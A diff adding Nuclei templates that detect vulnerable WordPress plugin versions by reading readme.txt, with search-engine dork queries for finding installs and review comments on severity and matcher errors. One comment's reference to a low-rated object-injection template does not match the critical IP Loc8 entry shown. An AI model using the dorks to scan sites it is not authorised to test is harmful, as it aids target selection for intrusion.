@@ -0,0 +1,59 @@ +id: event-calendars + +info: + name: > + Event Calendar <= 1.0.4 - Missing Authorization to Unauthenticated Arbitrary Calendar Deletion + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9694f4e0-be99-4122-82d2-b22e7422c877?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/event-calendars/" + google-query: inurl:"/wp-content/plugins/event-calendars/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,event-calendars,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/event-calendars/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "event-calendars" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/external-featured-image-from-bing.yaml b/poc/other/external-featured-image-from-bing.yaml new file mode 100644 index 0000000000..7c74d44045 --- /dev/null +++ b/poc/other/external-featured-image-from-bing.yaml 
@@ -0,0 +1,59 @@ +id: external-featured-image-from-bing + +info: + name: > + External featured image from bing <= 1.0.2 - Authenticated (Subscriber+) Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22d5a45b-41bd-4f65-b8b7-d7efb2b9cecf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/external-featured-image-from-bing/" + google-query: inurl:"/wp-content/plugins/external-featured-image-from-bing/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,external-featured-image-from-bing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/external-featured-image-from-bing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "external-featured-image-from-bing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml b/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml new file mode 100644 index 0000000000..02369dff0b --- /dev/null +++ b/poc/other/featured-posts-with-multiple-custom-groups-fpmcg.yaml 
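Review bot: `severity: low` sits next to a title that reads "Authenticated (Subscriber+) Remote Code Execution", and `cvss-score` is empty, so the rating looks like a default and not a value taken from the advisory. Code execution reachable from the lowest authenticated role would normally be triaged well above low, and scans filtered by severity would leave this template out. I would fill `cvss-metrics` and `cvss-score` from the referenced Wordfence record and set `severity` and the trailing severity tag to match. The same check is worth making for the Subscriber+ PHP Object Injection template at L117, which is also marked low.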
@@ -0,0 +1,59 @@ +id: featured-posts-with-multiple-custom-groups-fpmcg + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bc6fce33-af42-466e-8e76-1e027d5d52ec?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file diff --git a/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml b/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml new file mode 100644 index 0000000000..8ecf421e3e --- /dev/null +++ b/poc/other/flat-ui-button-89c780e5fcb1649d68625aca09850426.yaml 
@@ -0,0 +1,59 @@ +id: flat-ui-button-89c780e5fcb1649d68625aca09850426 + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/other/flexmls-idx.yaml b/poc/other/flexmls-idx.yaml new file mode 100644 index 0000000000..a84787b036 --- /dev/null +++ b/poc/other/flexmls-idx.yaml 
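Review bot: The final matcher is `compare_versions(version, '1.0')` with no comparison operator, while the title says "<= 1.0" and every sibling template in this diff passes an operator. As far as I know a bare constraint is treated as an equality test, so installs older than 1.0 would not be reported even though the advisory range covers them. The line should read `- compare_versions(version, '<= 1.0')`.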
@@ -0,0 +1,59 @@ +id: flexmls-idx + +info: + name: > + Flexmls® IDX Plugin <= 3.14.22 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/flexmls-idx/" + google-query: inurl:"/wp-content/plugins/flexmls-idx/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,flexmls-idx,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flexmls-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.14.22') \ No newline at end of file diff --git a/poc/other/fonto.yaml b/poc/other/fonto.yaml new file mode 100644 index 0000000000..bbad48bd42 --- /dev/null +++ b/poc/other/fonto.yaml 
@@ -0,0 +1,59 @@ +id: fonto + +info: + name: > + Fonto – Custom Web Fonts Manager <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fonto/" + google-query: inurl:"/wp-content/plugins/fonto/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fonto,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fonto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fonto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml b/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml new file mode 100644 index 0000000000..923e274e37 --- /dev/null +++ b/poc/other/gantry-8355d258c5013eab39c370d8a445bea5.yaml 
@@ -0,0 +1,59 @@ +id: gantry-8355d258c5013eab39c370d8a445bea5 + +info: + name: > + Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gantry/" + google-query: inurl:"/wp-content/plugins/gantry/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gantry,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gantry" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.21') \ No newline at end of file diff --git a/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml b/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml new file mode 100644 index 0000000000..08a8a104d6 --- /dev/null +++ b/poc/other/getresponse-5843fd2130c195d444e82707bb1d32a3.yaml 
@@ -0,0 +1,59 @@ +id: getresponse-5843fd2130c195d444e82707bb1d32a3 + +info: + name: > + GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/getresponse/" + google-query: inurl:"/wp-content/plugins/getresponse/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,getresponse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "getresponse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml b/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml new file mode 100644 index 0000000000..c33451663f --- /dev/null +++ b/poc/other/infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4.yaml 
@@ -0,0 +1,59 @@ +id: infinite-scroll-ecc3ceebb8b22551e98ee5bec4ce51d4 + +info: + name: > + Infinite-Scroll <= 2.6.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/infinite-scroll/" + google-query: inurl:"/wp-content/plugins/infinite-scroll/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,infinite-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infinite-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infinite-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.2') \ No newline at end of file diff --git a/poc/other/ip-loc8.yaml b/poc/other/ip-loc8.yaml new file mode 100644 index 0000000000..3883392424 --- /dev/null +++ b/poc/other/ip-loc8.yaml 
@@ -0,0 +1,59 @@ +id: ip-loc8 + +info: + name: > + IP Loc8 <= 1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/24092cd1-cf89-49c1-a607-4d5d06d0c804?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ip-loc8/" + google-query: inurl:"/wp-content/plugins/ip-loc8/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ip-loc8,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-loc8/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-loc8" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/post-from-frontend.yaml b/poc/other/post-from-frontend.yaml new file mode 100644 index 0000000000..b2d50ba1d9 --- /dev/null +++ b/poc/other/post-from-frontend.yaml 
@@ -0,0 +1,59 @@ +id: post-from-frontend + +info: + name: > + Post From Frontend <= 1.0.0 - Cross-Site Request Forgery to Arbitrary Post Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c092629f-177c-4201-9fdd-defe47f85811?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-from-frontend/" + google-query: inurl:"/wp-content/plugins/post-from-frontend/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-from-frontend,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-from-frontend/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-from-frontend" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/pretix-widget.yaml b/poc/other/pretix-widget.yaml new file mode 100644 index 0000000000..b05de21aa7 --- /dev/null +++ b/poc/other/pretix-widget.yaml 
@@ -0,0 +1,59 @@ +id: pretix-widget + +info: + name: > + pretix widget <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd106b92-48ee-46f4-b0a3-f595d227a0a1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/pretix-widget/" + google-query: inurl:"/wp-content/plugins/pretix-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,pretix-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pretix-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pretix-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml b/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml new file mode 100644 index 0000000000..45b00d7d2d --- /dev/null +++ b/poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml 
@@ -0,0 +1,59 @@ +id: product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8 + +info: + name: > + Product Customizer Light <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/product-customizer-light/" + google-query: inurl:"/wp-content/plugins/product-customizer-light/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,product-customizer-light,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-customizer-light/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-customizer-light" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/restaurantconnect-reswidget.yaml b/poc/other/restaurantconnect-reswidget.yaml new file mode 100644 index 0000000000..cbed4847ca --- /dev/null +++ b/poc/other/restaurantconnect-reswidget.yaml 
@@ -0,0 +1,59 @@ +id: restaurantconnect-reswidget + +info: + name: > + Restaurant Reservations Widget <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e08c0e74-4ce0-4278-8f58-909f7c24f346?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/restaurantconnect-reswidget/" + google-query: inurl:"/wp-content/plugins/restaurantconnect-reswidget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,restaurantconnect-reswidget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/restaurantconnect-reswidget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "restaurantconnect-reswidget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml b/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml new file mode 100644 index 0000000000..53193265dc --- /dev/null +++ b/poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml 
@@ -0,0 +1,59 @@ +id: rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via rfw-youtube-videos Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file diff --git a/poc/other/sb-random-posts-widget.yaml b/poc/other/sb-random-posts-widget.yaml new file mode 100644 index 0000000000..aab8db0908 --- /dev/null +++ b/poc/other/sb-random-posts-widget.yaml 
@@ -0,0 +1,59 @@ +id: sb-random-posts-widget + +info: + name: > + SB Random Posts Widget <= 1.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6fbf684-8651-484d-9459-ed11d6d9008f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sb-random-posts-widget/" + google-query: inurl:"/wp-content/plugins/sb-random-posts-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sb-random-posts-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sb-random-posts-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sb-random-posts-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/shortcode-support-for-elementor-templates.yaml b/poc/other/shortcode-support-for-elementor-templates.yaml new file mode 100644 index 0000000000..f5161dd6e0 --- /dev/null +++ b/poc/other/shortcode-support-for-elementor-templates.yaml 
@@ -0,0 +1,59 @@ +id: shortcode-support-for-elementor-templates + +info: + name: > + Shortcode For Elementor Templates <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5a3b416-4434-456e-91c7-24f874e8f959?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/shortcode-support-for-elementor-templates/" + google-query: inurl:"/wp-content/plugins/shortcode-support-for-elementor-templates/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,shortcode-support-for-elementor-templates,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-support-for-elementor-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-support-for-elementor-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/simple-baseball-scoreboard.yaml b/poc/other/simple-baseball-scoreboard.yaml new file mode 100644 index 0000000000..fc45175ca0 --- /dev/null +++ b/poc/other/simple-baseball-scoreboard.yaml 
@@ -0,0 +1,59 @@ +id: simple-baseball-scoreboard + +info: + name: > + Simple Baseball Scoreboard <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0519d77a-2fbd-48d5-bc2b-9efb84f9e559?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-baseball-scoreboard/" + google-query: inurl:"/wp-content/plugins/simple-baseball-scoreboard/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-baseball-scoreboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-baseball-scoreboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-baseball-scoreboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/smooth-gallery-replacement.yaml b/poc/other/smooth-gallery-replacement.yaml new file mode 100644 index 0000000000..b5b46fc51f --- /dev/null +++ b/poc/other/smooth-gallery-replacement.yaml 
@@ -0,0 +1,59 @@ +id: smooth-gallery-replacement + +info: + name: > + Smooth Gallery Replacement <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba8c88e9-e84c-4fe7-a3b1-ee77c49d5590?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smooth-gallery-replacement/" + google-query: inurl:"/wp-content/plugins/smooth-gallery-replacement/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smooth-gallery-replacement,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smooth-gallery-replacement/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smooth-gallery-replacement" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml b/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml new file mode 100644 index 0000000000..f313a5f72f --- /dev/null +++ b/poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml 
@@ -0,0 +1,59 @@ +id: suki-sites-import-4694ec357c3309f764352c01cbaa3638 + +info: + name: > + Suki Sites Import <= 1.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c6dd146-a99e-4317-a703-de34735317c8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/suki-sites-import/" + google-query: inurl:"/wp-content/plugins/suki-sites-import/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,suki-sites-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/suki-sites-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "suki-sites-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml b/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml new file mode 100644 index 0000000000..d72be56202 --- /dev/null +++ b/poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml 
